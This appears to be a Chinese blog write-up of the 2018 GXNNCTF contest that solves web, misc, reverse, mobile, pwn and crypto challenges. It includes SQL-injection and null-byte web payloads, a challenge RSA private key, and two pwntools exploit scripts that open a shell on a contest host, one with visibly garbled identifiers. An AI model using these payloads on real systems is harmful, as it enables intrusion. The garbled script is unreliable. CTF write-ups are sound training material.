GXNNCTF 2018 We_ax WriteUp 第三届南宁市网络安全技术大赛

最新推荐文章于 2022-12-23 10:48:10 发布
最新推荐文章于 2022-12-23 10:48:10 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: CTF 文章标签: 南宁市CTF 广西CTF WriteUp GXNNCTF 2018 第三届南宁市网络安全技术大赛
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KaiKaiaiq/article/details/85055809
版权

By:桂林电子科技大学We_ax战队

Web

超简单

分值:100 类型:WEB 已解决

题目:超简单的web题  http://gxnnctf.gxsosec.cn:12311/

看到ereg函数,猜测有00截断漏洞。

后面要求不是数字,又要在白名单里(0-9之间)

构造payload:?no=1%001。

 

帽子商城

分值:200 类型:WEB 未解决

题目:有帽子你就能变强,去这买几顶帽子吧 http://gxnnctf.gxsosec.cn:12313

 

 

sql???

分值:200 类型:WEB 已解决

题目:小明想当一名黑客,于是学习写网站,但他遇到点问题,帮帮他吧

1.Sql注入失败。

2.Git泄漏文件

3.审计代码:

在Index中:

代码要求id对应的username在第一次被检查的时候是guest

但是在第二次被检测的时候要是admin

由于没有屏蔽case,构造如下Payload=“case when @a is null then @a:=2 else 1 end#”

 

GET传参 backdoor=Melonrind

url.decode()

id=case+when+% 40a+is+null+then+% 40a% 3a% 3d2+else+1+end% 23&backdoor=Melonrind

 

 

Misc

 

 

太简单了

分值:50 类型:MISC 已解决

题目:http://www.gxsosec.cn/resources/uploads/file/20181214/d25ebcc135cad51d4d4b6aca36203a34.zip

 

flag文件是一个zip文件,修复文件头。

getflag

 

 

 

 

misc2

分值:100 类型:MISC 已解决

题目:小明下载资源得时候发现变成了压缩包,而且他没有密码,你们能帮帮他吗?http://www.gxsosec.cn/resources/uploads/file/20181214/6bce69d2b9b8c62e90f089d86b5a729c.zip

 

1.CRC碰撞出txt文本内容

2.字符串拼接 base64.decode

 

 

 

 

这是啥

分值:100 类型:MISC 未解决

题目:

666666(题目文件已更新)

http://www.gxsosec.cn/resources/uploads/file/20181215/0e7a481704ceb84b8ef1904a62f023c0.zip

 

 

未知文件

分值:200 类型:MISC 已解决

题目:小明下资源的时候又下回来一个压缩包,但是他打不开,能帮帮他吗?

1.十六进制查看,含有Png文件和pyc文件,并导出。

2.pyc反编译后,我们需要有md5,几个文件的md5都试了一下

5dde2e3b6a46a5e7ebe6214347f74f9c
caf2311290e2e1809be5cc606b25b98a
a2bac3d666f32aa9848ab758a5f5331d
e353326bb69da25eb88b26c7cefffa14

C++

int main()
{
 char md5[] = "a2bac3d666f32aa9848ab758a5f5331d";
//char code[] = "ctf_is_so_hard..";
 char check[] = { 59, 106, 36, 41, 115, 33, 54, 63, 99, 42, 52, 120, 38, 38, 115, 40, 00 };
 for (int i = 0; i < 16; i++)
 {
  cout << (char)(md5[i*2]^md5[i*2+1] ^ check[i]) ;
 }
 system("pause");
 return 0;
}
//“hit{stegosaurus}”

给出提示“stegosaurus”,python字节码隐写工具。

stegosaurus.py 查看隐写

gxnnctf{Hldd3n_Tre@sure}

 

txt

分值:100 类型:MISC 已解决

题目:

小明下载资源又下到了不知道什么鬼,你能帮帮他吗

 

文本中含有 不可视 无长度字符(E2 80 8F)

github项目:https://github.com/offdev/zwsp-steg-js

 

 

RE

大佬来破解呀

分值:200 类型:Reverse 未解决

题目:

RAR可是加密的哦

http://www.gxsosec.cn/resources/uploads/file/20181214/f7dd43caf14cb4b781ce76c2240efb7c.rar

 

USBKey Crack

分值:150 类型:Reverse  已解决

题目:

某单位的系统登录

http://www.gxsosec.cn/resources/uploads/file/20181214/0390e3155b79279537ab0d39a70ad603.zip

1.dll调用 无壳

2.四个输出表

审计代码看到:

sub_10009550()函数中有Login过程

*Str2 = 'D\08';
v17='R\0j';
v18='T\0E';
v19='j\01';
v20='L\0E';
v21='C\0o';
v22='K\0r';
v23='v\0b';
v24='v\0R';
v25='M\0O';
v26='i\0y';
v27='x\0z';
Unicode编码。
v8 = !StrCmpW(v7, L"admin") && !StrCmpNW(v4, Str2, 24);
 

查交叉调用,找到

sub_100091B0():

v45='l\0f';
v46='g\0a';
v47='T\0{';
v48='a\0h';
v49='_\0t';
v50='s\0i';
v51='A\0_';
v52='_\0n';
v53='w\0A';
v54='0\0s';
v55='e\0m';
v56='L\0_';
v57='f\0i';
v58='}\0e';
GetFlag

 

SMC

分值:100 类型:Reverse 已解决

题目:

easy rev

http://www.gxsosec.cn/resources/uploads/file/20181214/8b5b4ee21883d6ee9489e88426b1555f.zip

About binary

1.32位Win.Pe程序
2.UPX加壳

Analyze

1.先判断输入字符最后一个是否等于'}'

2.异或

int v1[] = { 0xa, 0xf, 0x19, 0x31, 00, 0x14, 0x12, 0xc };
int v2[] = { 0x6d, 0x77, 0x77, 0x5f, 0x63, 0x60, 0x74, 0x77 };
for (int i = 0; i < 8; ++i)
{
  cout << (char)(v1[i]^v2[i]);
}
//“gxnnctf{”

3.异或

int v3[] = { 0x3d, 0x0b, 0x5f, 0x08, 0x43 };
for (int i = 0; i < 5; ++i)
{
  cout << (char)(v3[i] ^ 0x6e);
}
//“Se1f-”

 

4.Base64

  base64.decode("TTBkaWZ5aW5n")="M0difying"

5.

char v4[] = "ae2fg#";
for (int i = 0; i < 7; ++i)
{
  cout << (char)(v4[i]-2);
}
//“_c0de!”

//gxnnctf{Se1f-M0difying_c0de!}

 

 

twins

分值:250 类型:Reverse 已解决

题目:

http://www.gxsosec.cn/resources/uploads/file/20181214/8f05779b83a5e68c40c5500b26f21f87.zip

About binary

1.32Bit.Win.Pe
2.Upx加壳
3.MFC

Analyze

1.Api断点设置 MessageBox,找到事件

sub_401A90:

 v7 = CString::GetBuffer(&v14, 17);
  if ( CString::IsEmpty(&v14) )
  {
    CWnd::MessageBoxA(v15, "Wrong!", 0, 0);
    CDialog::EndDialog(v15, 0);
  }
  if ( CString::GetLength(&v14) != 16 )
  {
    CWnd::MessageBoxA(v15, "Wrong!", 0, 0);
    CDialog::EndDialog(v15, 0);
  }
  v1 = CString::operator char const *(&v14);
  v2 = sub_40100F(&unk_416900, v1);
  CString::operator=(&v13, v2);
  v6 = CString::GetBuffer(&v13, 33);
  for ( i = 0; i < 16; ++i )
  {
    *(&v8 + 2 * i) = v7[i] / 16 + 48;
    v9[2 * i] = v7[i] % 16 + 48;
  }
  v10 = 0;
  for ( j = 0; j < 32; ++j )
  {
    if ( *(&v8 + j) == v6[j] )
      ++v11;
  }
  if ( v11 == 32 )
  {
    CWnd::MessageBoxA(v15, "Congragulation!", 0, 0);
    CDialog::EndDialog(v15, 0);
  }

简化代码:

char in_str[] = "1234567890123456";
char str2[33] = { 0 };
str2 = String_to_Hex(in_str);
if (strcmp(str2, md5(in_str)))
{
  //Congragulation!
}

很难爆破出来,怀疑题目暗藏代码。

2.查看汇编代码,找到一个可疑段。题目把其中一个按钮设为不可视。

0x00401D10
这里因为没有IDA没有解析成函数。
 CString::CString(&v10);
  v73 = 0;
  CString::CString(&v9);
  LOBYTE(v73) = 1;
  CWnd::GetWindowTextA((v72 + 96), &v10);
  v1 = CString::operator char const *(&v10);
  v2 = sub_40100F(&unk_416900, v1);
  CString::operator=(&v9, v2);
  v8 = CString::GetBuffer(&v10, 18);
  for ( i = 0; i < 32; ++i )
    *(&v12 + i) ^= v11;
  v44 = 0;
  if ( operator!=(&v9, &v12) )
  {
    CDialog::EndDialog(v72, 0);
  }
  else
  {
    for ( j = 0; j < 27; ++j )
      v6[j] = *(&v45 + j) ^ v8[(j + 2) % 17];
    v7 = 0;
    CWnd::MessageBoxA(v72, v6, 0, 0);
    CDialog::EndDialog(v72, 0);
  }
  LOBYTE(v73) = 0;
  CString::~CString(&v9);
  v73 = -1;
  return CString::~CString(&v10);
}

附C++代码:

int v45[] = { 20, 11, 25, 1, 17, 16, 86, 74, 118, 90, 85, 89, 89, 80, 80, 17, 18, 7, 4, 24, 13, 7, 16, 68, 94, 92, 78 };
 int v12[] = { 8, 12, 95, 14, 83, 88, 91, 14, 88, 12, 91, 82, 15, 15, 89, 90, 93, 93, 92, 82, 89, 14, 92, 15, 89, 14, 94, 90, 93, 11, 12, 8, 0, 106 };
 char input[] = "password0123456789";
 int v11 = 106;
 char v6[27];
 for (int i = 0; i < 32; ++i)
 {
  v12[i] ^= v11;
  cout << (char)v12[i] ;
 }
 cout << endl;


 for (int j = 0; j < 27; ++j)
 {
  v6[j] = v45[j] ^ input[(j + 2) % 17];
  cout << (char)v6[j];
 }
 cout << endl;

Return:

md5_code="bf5d921d2f18ee3077683d6e3d407afb"
mad_decode="password0123456789"
flag="gxnnctf{Dialoghastwobutton}"

 

Debug

分值:150 类型:Reverse 已解决

题目:

http://www.gxsosec.cn/resources/uploads/file/20181215/cbe109be7e440066d5d393246eca7aa3.zip

1.损坏Elf文件

2.审计汇编。

3.sub_80484C0()函数

for ( i = 0; i <= 26; ++i )
    *(&v13 + i) ^= *(&v5 + 4 * (i % 3));
  for ( j = 0; j <= 26; ++j )
  {
    if ( *(&v13 + j) <= 47 || *(&v13 + j) > 57 )
    {
      if ( *(&v13 + j) <= 64 || *(&v13 + j) > 90 )
      {
        if ( *(&v13 + j) <= 96 || *(&v13 + j) > 122 )
          v11[j] = *(&v13 + j) + 1;
        else
          v11[j] = *(&v13 + j) - 32;
      }
      else
      {
        v11[j] = *(&v13 + j) + 32;
      }
    }
    else
    {
      v11[j] = (*(&v13 + j) - 53) % 10 + 48;
    }
  }

C++代码:

__int8 v13[] = { -55, 66, -118, -64, 89, -112, -56, 96, -91, -36, 95, -102, -41, 47, -111, -48, 79, -105, -72, 84, -125, -48, 93, -128, -52, 36, -72, 0 };
 __int8 v41[] = { -15, -23, -109, -41, -28, -42, -52, -14, -42, -60, -95, -102, -52, -11, -126, -55, -28, -42, -57, -24, -126, -123, -10, -124, -54, -17, -111, -124, -117, 0 };

 int v5[] = { 142, 26, 196 };
 int v8[] = { 165, 129, 246 };
 char v11[27] = { 0 };
 for (int i = 0; i <= 26; ++i)
 {
  v13[i] ^= v5[(i % 3)];
 }

 for (int j = 0; j <= 26; ++j)
 {
  if (v13[j] <= '/' || v13[j] > '9')
  {
   if (v13[j] <= '@' || v13[j] > 'Z')
   {
    if (v13[j] <= '`' || v13[j] >= 'z')//这里改了一下
     v11[j] = v13[j] + 1;
    else
     v11[j] = v13[j] - 32;
   }
   else
   {
    v11[j] = v13[j] + 32;
   }
  }
  else
  {
   v11[j] = (v13[j] - 53) % 10 + 48;
  }
 }
 for (int i = 0; i < 27; i++)
 {
  cout << v11[i];
 }
 system("pause");

gxnnctf{Are_y0u_us1ng_gdb?}

 

 

solving

分值:300 类型:Reverse 已解决

题目:

http://www.gxsosec.cn/resources/uploads/file/20181216/25af80b15e8c3d3a1f6fd4227bca9386.zip

用ida打开

查看字符串很有意思

目测做过

详细解题过程以前发过帖子

https://www.52pojie.cn/thread-800582-1-1.html

gxnnctf{logged_in_my_reverse}

 

Mobile

 

常规加密算法

分值:300 类型:Android 已解决

题目:

http://www.gxsosec.cn/resources/uploads/file/20181214/3cb21e0554e84959d845ae493ff74e7b.zip

1.Twofish算法

Twofish_setup(T,"faQW1ZKVGhmD7K1uWB9Q0fwP",192)
Twofish_decryt(T, 99CEE869E3BF3E61927FA66123ABAFD9h, &Result);
Result=“it_w@3_n0t_kn0wn”

 

2.So动态调试

在Twofish_setup后 jmp 到Twofish_decryt(v10, &v12, &v15);
或者
改call __Z14Twofish_decrytP9twofish_tPhS1_
push eax push eax 
第二次压栈的内容

 

 

 

OS_200

分值:200 类型:IOS 已解决

题目:

http://www.gxsosec.cn/resources/uploads/file/20181214/fdcb879f4a93a490581a9433ae2fc68a.zip

ida打开

看见函数中 Rsa_decode

if ( v9 & 1 )
  {
    v10 = objc_msgSend(&OBJC_CLASS___UIAlertView, "alloc");
    v11 = ((id (__cdecl *)(RSA_meta *, SEL, id, id))objc_msgSend)(
            (RSA_meta *)&OBJC_CLASS___RSA,
            "decryptString:privateKey:",
            (id)flag,
            (id)privkey);
    v12 = objc_retainAutoreleasedReturnValue((__int64)v11);
    v15 = objc_msgSend(
            v10,
            "initWithTitle:message:delegate:cancelButtonTitle:otherButtonTitles:",
            CFSTR("info"),
            v12,
            0LL,
            CFSTR("ok"),
            0LL);
    objc_release(v12);
    objc_msgSend(v15, "show");
    objc_storeStrong(&v15, 0LL);
  }

 

 
tVeemPfsMFeRTEabVJCZyVgj01+uNBrgziTdG6RaJI/UiVNFBZW2mcpkLIWUgqDxw8TQZx+WXQhX+To4auZKSGfG5LL2jnBElSjgUGGwNWM7BYiKERF7oAnOP3KNn2JeFThmYclyATUX//OmnzEp7bOgdr5CvmV2IEa3DFG7tDY=

 

私钥:

MIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBAMMjZu9UtVitvgHS
tpmAU/rRVdhy9GaT2rnpCJOYSb0deVI+rXPKHI9Aca2LkWiRgkzM1wqbRvAvWrqK
gm4PgQUjnoNr7vRd1HPUKNA9ATfJetddW86yar0ux3FMVaxUFN6F0KatqkplVXHo
8qXubKHRx9dCbK95P96rJkrWBiO9AgMBAAECgYBO1UKEdYg9pxMX0XSLVtiWf3Na
2jX6Ksk2Sfp5BhDkIcAdhcy09nXLOZGzNqsrv30QYcCOPGTQK5FPwx0mMYVBRAdo
OLYp7NzxW/File//169O3ZFpkZ7MF0I2oQcNGTpMCUpaY6xMmxqN22INgi8SHp3w
VU+2bRMLDXEc/MOmAQJBAP+Sv6JdkrY+7WGuQN5O5PjsB15lOGcr4vcfz4vAQ/uy
EGYZh6IO2Eu0lW6sw2x6uRg0c6hMiFEJcO89qlH/B10CQQDDdtGrzXWVG457vA27
kpduDpM6BQWTX6wYV9zRlcYYMFHwAQkE0BTvIYde2il6DKGyzokgI6zQyhgtRJ1x
L6fhAkB9NvvW4/uWeLw7CHHVuVersZBmqjb5LWJU62v3L2rfbT1lmIqAVr+YT9CK
2fAhPPtkpYYo5d4/vd1sCY1iAQ4tAkEAm2yPrJzjMn2G/ry57rzRzKGqUChOFrGs
lm7HF6CQtAs4HC+2jC0peDyg97th37rLmPLB9txnPl50ewpkZuwOAQJBAM/eJnFw
F5QAcL4CYDbfBKocx82VX/pFXng50T7FODiWbbL4UnxICE0UBFInNNiWJxNEb6jL
5xd0pcy9O2DOeso=

解密得

flag{H01id@y_h@ck_ch@11enge}

 

Basic

 

Her Majesty Queen Elizabeth II

分值:50 类型:Basic 未解决

题目:

基础题:FE&pd8dMFLR%)(DsGbhi@/dKPNR'*TUm?\tlr.7RV

 

PWN

 

format

分值:200 类型:PWN 未解决

题目:host:47.106.209.151 port:44444

1.Blind Pwn。

2.Fotmat While循环格式化字符串利用。

3.由于网速太慢,Dump失败。

4.查看栈上地址

for i in range(0,500):
    p.sendline("%"+str(i)+"p")
    raw_input()

我们发现在260+ 位置会出现libc地址。

5.在printf执行过程中会出现vprintf函数。控制这个跳转即可。

exp:

from pwn import*
context.log_level = 'debug'
p = rlibcmotlibc( '47.106.209.151',44444)
libc = ELF("./x86_libc.so.6")
payload = '%267$p'
p.sendline(payload)
libc_baslibc =  int(p.recv(),16) - 0x18637
system_libc_addr = libc_baslibc + libc.symbols["system"]
p.sendline("%p")
stack = int(p.recv(),16)
onlibc = 0x3a812 + libc_baslibc
payload=fmtstr_payload(7,{stack-4*8:system_libc_addr,stack-4*6:stack+0x100},writlibc_sizlibc='bytlibc')
payload=payload.ljust(0x100)+'/bin/sh\x00'
p.sendline(payload)
p.interactive()

 

 

 

x64

分值:200 类型:PWN 已解决

题目:host:47.106.209.151 port:55555http://www.gxsosec.cn/resources/uploads/file/20181215/d77a475ff316855b5931fbe19ab28168.zip

exp:

from pwn import *
context.log_level="debug"
p=remote("47.106.209.151",55555)#process("./pwn")
elf=ELF("./pwn")
libc=ELF("./x64_libc.so.6")
write_got=elf.got["write"]
print hex(write_got)
p.recv()
raw_input()
payload="a"*(8*16+8)+p64(0x0040062a)+p64(0)+p64(1)+p64(write_got)+p64(8)+p64(write_got)+p64(1)+p64(0x00400610)+56*'a'+p64(0x0040059d)
p.sendline(payload)
str1=p.recv()[0:8]
write_got_addr=u64(str1)
system_addr=write_got_addr-libc.symbols["write"]+libc.symbols["system"]
binsh_addr=write_got_addr-libc.symbols["write"]+next(libc.search("/bin/sh"))
print hex(system_addr)
print hex(binsh_addr)
payload="a"*(8*16+8)+p64(0x0000000000400633)+p64(binsh_addr)+p64(system_addr)+p64(0x0040059d)
p.sendline(payload)
p.interactive()

 

 

 

Crypto

 

维吉尼亚遇上困难

分值:200 类型:Crypto 已解决

题目:

BZGTNPMMCGZFPUWJCUIGRWXPFNLHZCKOAPGLKYJNRAQFIUYRAVGNPANUMDQOAHMWTGJDXGOMPJPTKAAVZIUIWKVTUCWBWNFWDFUMPJWPMQGPTNWXTSDPLPMWJAXUHHXWPFXXGVAPFNTXVFKOYIRBOQJHCBVWVFYCGQFGUSUBDWVIYATJGTBNDKGHCTMTWIUEFJITVUGJHHIMUVJICUWYQWYGGUWPUUCWIFGWUANILKPHDKOSPJTTWJQOJHXLBJAPZHVQWPDYPGLLGDBCHTGIZCCMEGVIIJLIFFBHSMEGUJHRXBOQUBDNASPEUCWNGWSNWXTSDPLPMWJAIUHUMWPSYCTUWFBMIAMKVBNTDMQNBVDKILQSSDYVWVXIGDQFIBHSLEAVDBXGOLGDBCHTGIZVNFQFKTNGRWXUDCTGKWCOXIXKZPPFDZGXNBAXLGGWBLTLWCKOXAR

维吉尼亚解密:

THESTATEKEYLABORATORYOFNETWORKINGANDSWITCHINGTECHNOLOGYBELONGSTOBEIJINGUNIVERSITYOFPOSTSANDTELECOMMUNICATIONSTHELABORATORYWASOPENEDINNINETEENNINETYTWOINNINETEENNINETYFIVETHELABORATORYPASSEDACCEPTANCEINSPECTIONBOGOVERNMENTANDANEVALUATIONORGANIZEDBYMINISTRYOFSCIENCEANDTECHNOLOGYINTWOTHOUSANDANDTWOSINCETWOTHOUSANDANDFOURTHELABORATORYHASBEENRENAMEDASTHESTATEKEYLABORATORYOFNETWORKINGANDSWITCHINGTECHNOLOGYBYMINISTRYOFSCIENCEANDTECHNOLOGYFLAGISYOUARESOKINDLY

FLAG IS YOU ARE SOKINDLY

 

 

 

shamir重要数据损坏

分值:150 类型:Crypto 已解决

题目:

某集团总裁Shamir将自己使用的笔记本电脑上重要的秘密数据分割成5份子秘密数据,并分别存放在5个存储设备上,其中可以由至少3份子秘密数据联合参与运算,才能重构原来的秘密数据。分割方案使用的参数模数为5987。由于Shamir使用的笔记本电脑感染病毒致使该重要秘密数据损坏无法修复,于是Shamir让技术人员通过存放在编号为5、7、9的三个存储设备的子秘密数据进行重构重要秘密数据,其中编号5的存储设备存放的数据为(5,2258)、编号为7的存储设备存放的数据为(7,2424)、编号为9的存储设备存放的数据为(9,2630)。请问技术人员重构出来的重要秘密数据是多少?

提示:多项式f(x) x=5 7 9

 

谷歌Shamir(k,n) 找到解密方法

https://en.wikipedia.org/wiki/Shamir%27s_Secret_Sharing#Reconstruction

 

列出
D0 = (5, 2258) D1 = (7, 2424) D2 = (9, 2630)

 

得到

t0 = ((x-9)/(5-9))*((x-7)/(5-7))
t1 = ((x-9)/(7-9))*((x-5)/(7-5))
t2 = ((x-5)/(9-5))*((x-7)/(9-7))
f(x)∑=2018+9055x+5x^2

 

key:2018

 

 

 

 

 

 

俺是大宝kaikaizhu
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛 - 线上赛 Writeup 第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛-
04741计算机网络原理2018年版-第二章 网络应用 知识要点
滔滔不绝的博客
02-16 2084
一、网络应用体系结构 标记: 1. 网络应用体系结构与分类 领会: 1. C/S网络应用、P2P网络应用以及混合网络应用的特点、区别与联系 二、网络应用通信基本原理 领会: 1. 网络应用的基本通信过程 2. 网络应用与传输层服务 3.应用编程接口API的概念 4.网络应用进程的标识 5.IP地址与端口号 三、典型网络应用及应用层协议 标记 1. 典型网络应用的作用、特点及应用层协议 领会: 1. 域名解析性DNS的域名结构 2. DNS的主要功能 3. 各类域名服务器 4. HTTP及其特点 5. HTT
c++中vector向量几种情况的总结(向量指针,指针的向量)
热门推荐
s9434的博客
04-03 50万+
1.标准库vector类型 vector 是同一种类型的对象的集合,每个对象都有一个对应的整数索引值。标准库将负责管理与存储元素相关的内存。我们把 vector 称为容器,是因为它可以包含其他对象。一个容器中的所有对象都必须是同一种类型的。 用 vector之前,必须包含相应的头文件。 #include using std::vector; vector 是一个类模板(class te
CTF pyc之stegosaurus隐写
3tefanie丶zhou的博客
03-09 2221
【施恩宜由淡转浓,由浓转淡反成仇。刑罚宜由严转宽,先宽后严怨其酷。】
攻防世界 Misc高手进阶区 5分题 latlong
闵行小鱼塘
12-18 1082
继续ctf的旅程,攻防世界Misc高手进阶区的5分题,本篇是latlong的writeup
CTF竞赛进阶 (一) 密码学
single7_的博客
11-21 3893
0x01 概述 Crypto 相比于 web 和 pwn,更考验参赛者的基础知识,对数学能力、逻辑思维能力与分析能力都有很高的要求。 密码学题目多种多样,包括但不限于: 通过密文分析明文 缺陷自定义密码体制分析解密文 加/解密机交互接口,利用弱点来泄露某些敏感信息 0x02 编码 0x02a 概念 字符编码(英语:Character encoding)、字集码是把字符集中的字符编码为指定集合中某一对象(例如:比特模式、自然数序列、8位组或者电脉冲),以便文本在计算机中存储和通过通信网络的传递。常见的例子
山东省大学生网络安全技能大赛决赛Writeup.pdf
09-30
山东省大学生网络安全技能大赛决赛Writeup.pdf
2018第二届强网杯线上赛ctf web writeup(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大赛必刷题
2021一带一路暨金砖大赛之企业信息系统安全赛项AWD-writeup(解析)
12-18
通过赛项检验参赛选手网络组建、安全架构和网络安全运维管控等 方面的技术技能,检验参赛队组织和团队协作等综合职业素养,培养学 生创新能力和实践动手能力,提升学生职业能力和就业竞争力。通过大 赛引领专业教学...
NewStarCTF公开赛week3密码学前两道题的wp
Altering_Ji的博客
12-23 1135
因为只会做前两题所以只能写两道题的wp了,内容涉及DH密钥交换和Shamir秘密分享
stegosaurus:一种(非常基本的)隐写设备,用于将有效载荷编码为图像
05-07
关于剑龙 一种非常基本的,用于将有效载荷存储在(png)图像中。 生成的图像(具有隐藏的有效负载)在人眼中应与原始图像相同。 对于有些现实的用例,您可能会发现对图像加水印很有用。 除非您是詹姆斯·邦德,否则,也许您会发现其他用途。 您可以在本自述文件的底部附近找到样本原始和编码图像。 注意事项 目前,它仅支持png文件。 我还没有尝试使用二进制文件(只是ascii文本),如果是豚鼠,请尝试一下。 关于水印:如果对图像进行压缩或调整大小,它将丢失此不可见的水印。 在底部附近查看未来计划。 安装 只需使用NPM进行安装,就这么简单。 npm install stegosaurus 基本CLI用法 CLI安装说明对于命令行使用,您可能需要使用sudo npm install -g stegosaurus 。 否则,您将必须使用完整路径来运行它。 或将其添加到您的路径。 您总能
CTF中那些脑洞大开的编码和加密
05-02
CTF中那些脑洞大开的编码和加密
2018南宁ctf RE题目
12-18
2018年4道南宁CTF RE题目,有Windows逆向也有linux逆向
[UTCTF2020]Curveball (考点:Shamir‘s 秘密分享)
MikeCoke的博客
03-09 958
给的题目: My friend Shamir was trying to share the flag with me and some of the other problem writers, but he wanted to make sure it didn’t get intercepted in transmission, so he split it up. He said that the secrets that he shared will help us find the flag,
CTF密码学常见加密解密总结
qq_40837276的博客
05-17 4万+
CTF密码学常见加密解密总结 被实验吧一堆大佬出题人折磨的死去活来的我,嘤嘤嘤。在此做个总结,防止自己忘掉: Escape加密/UnEscape解密 JavaScript unescape() 函数可对通过 escape() 编码的字符串,找到形式为 %xx 和 %uxxxx 的字符序列(x 表示十六进制的数字),用 Unicode 字符 \u00xx 和 \uxxxx 替换这样的字符序列进行解码...
DDCTF联盟决策大会-shamir解密
playmaker的博客
04-20 907
拿到题目是一个shamir解密和一堆十六进制字符串,使用脚本解密 import shamir p=0x85FE375B8CDB346428F81C838FCC2D1A1BCDC7A0A08151471B203CDDF015C6952919B1DE33F21FB80018F5EA968BA023741AAA50BE53056DE7303EF702216EE9 pairs1 = [] pairs...
基于MTK平台kpd驱动初步分析
android之旅
01-07 4740
一、kpd_pdrv_probe函数的分析:     /*1. 输入设备实例  kpd_input_dev */  全局变量:static struct input_dev *kpd_input_dev;        static int kpd_pdrv_probe(struct platform_device *pdev)  {      int i, r;     
AccessControl-5.3-cp39-cp39-manylinux_2_5_i686.whl.zip
04-15
AccessControl-5.3-cp39-cp39-manylinux_2_5_i686.whl.zip
AccessControl-6.1-cp39-cp39-manylinux_2_5_x86_64.whl.zip
最新发布
04-15
AccessControl-6.1-cp39-cp39-manylinux_2_5_x86_64.whl.zip
蓝帽杯全国大学生网络安全技能大赛
08-24
蓝帽杯全国大学生网络安全技能大赛是一项面向全国大学生的网络安全竞赛。该比赛旨在提升大学生的网络安全技能和意识,促进网络安全人才的培养。比赛内容涵盖了各个领域的网络安全知识和技能,包括但不限于电子取证、加密通道、Web安全等方面。 该比赛提供了一系列赛题和附件,选手需要根据题目要求进行解答和实践。例如,电子取证赛题中,选手需要完成对手机取证的任务,通过分析附件中的数据和信息来获取所需的证据[2]。还有其他赛题如加密的通道和Web安全等,选手需要运用相关的知识和技能来解决问题。蓝帽杯全国大学生网络安全技能大赛为大学生提供了锻炼和展示自己网络安全能力的平台,也为培养网络安全人才作出了积极的贡献。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)](https://blog.csdn.net/ZXW_NUDT/article/details/126173643)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [[ CTF ]天机战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(初赛)](https://blog.csdn.net/ZXW_NUDT/article/details/125715546)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值